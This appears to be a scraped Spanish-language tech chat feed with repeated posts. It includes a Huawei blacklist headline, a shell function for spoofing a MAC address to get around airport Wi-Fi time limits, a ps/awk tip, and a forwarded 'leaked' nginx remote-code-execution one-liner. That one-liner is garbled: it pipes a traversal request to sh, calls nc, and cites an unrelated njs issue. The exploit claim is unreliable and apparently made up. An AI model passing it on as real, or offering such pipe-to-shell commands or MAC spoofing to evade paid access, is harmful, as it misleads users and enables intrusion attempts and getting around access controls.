Forwarded from @rafex
Gizmodo en Español
Huawei no podrá instalar Android ni las aplicaciones de Google en sus próximos teléfonos
El jueves, la administración de Donald Trump incluyó oficialmente a Huawei en la lista negra del Departamento de Comercio. Además de prohibir la venta de cualquier producto de Huawei en Estados Unidos (incluyendo móviles y equipos de redes), ninguna empresa…
Tssss!
Si estás en el aeropuerto y ya termino tu tiempo puedes cambiar tu mac y listo :.)
function changeMac() {
local mac=$(openssl rand -hex 6 | sed 's/\(..\)/\1:/g; s/.$//')
sudo ifconfig en0 ether $mac
sudo ifconfig en0 down
sudo ifconfig en0 up
echo "Your new physical address is $mac"
}
Si estás en el aeropuerto y ya termino tu tiempo puedes cambiar tu mac y listo :.)
function changeMac() {
local mac=$(openssl rand -hex 6 | sed 's/\(..\)/\1:/g; s/.$//')
sudo ifconfig en0 ether $mac
sudo ifconfig en0 down
sudo ifconfig en0 up
echo "Your new physical address is $mac"
}
Linux Jedi Mind Tricks:
Print number of processes running as each user
$ps -ef | awk '{print $1}' | sort | uniq -c
2 avahi
1 colord
1 lp
1 message+
1 nobody
134 root
1 rtkit
1 syslog
65 teresita
1 UID
Print number of processes running as each user
$ps -ef | awk '{print $1}' | sort | uniq -c
2 avahi
1 colord
1 lp
1 message+
1 nobody
134 root
1 rtkit
1 syslog
65 teresita
1 UID
Forwarded from Israel Garcia
LEAKED: Nginx 1.x Web server PoC on-liner.
Null-byte RCE overflow in nginx BLT/Stream
curl -gsS hxxps://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 victim.server.here/../../../%00/n …\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
https://github.com/nginx/njs/issues/159
Null-byte RCE overflow in nginx BLT/Stream
curl -gsS hxxps://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 victim.server.here/../../../%00/n …\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
https://github.com/nginx/njs/issues/159
GitHub
Integer-overflow in String.prototype.concat(). · Issue #159 · nginx/njs
>> var s = 'x'.repeat(2**10).repeat(2**19) undefined >> var a = Array(8).fill(s) undefined >> String.prototype.concat.apply(s, a.slice(1)) ...